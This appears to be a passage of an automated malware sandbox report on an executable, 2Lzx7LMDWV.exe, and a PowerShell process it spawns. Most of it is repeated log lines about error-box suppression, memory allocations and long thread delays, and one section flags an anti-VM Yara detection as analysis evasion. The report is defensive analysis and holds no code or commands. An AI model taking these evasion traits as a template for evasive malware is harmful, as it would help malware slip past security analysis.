Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: 2Lzx7LMDWV.exe PID: 7416, type: MEMORYSTR

Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Memory allocated: 9F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Memory allocated: 25E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Memory allocated: 45E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Memory allocated: 8930000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Memory allocated: 9930000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Memory allocated: 9B40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Memory allocated: AB40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Memory allocated: B230000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Memory allocated: C230000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Memory allocated: D230000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Memory allocated: 2C80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Memory allocated: 2EA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Memory allocated: 2DF0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 598651	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 598544	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 598393	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 598266	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 598047	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 597937	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 596170	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 596040	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 595917	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 595783	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 595000	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 594891	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 594781	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 594668	Jump to behavior
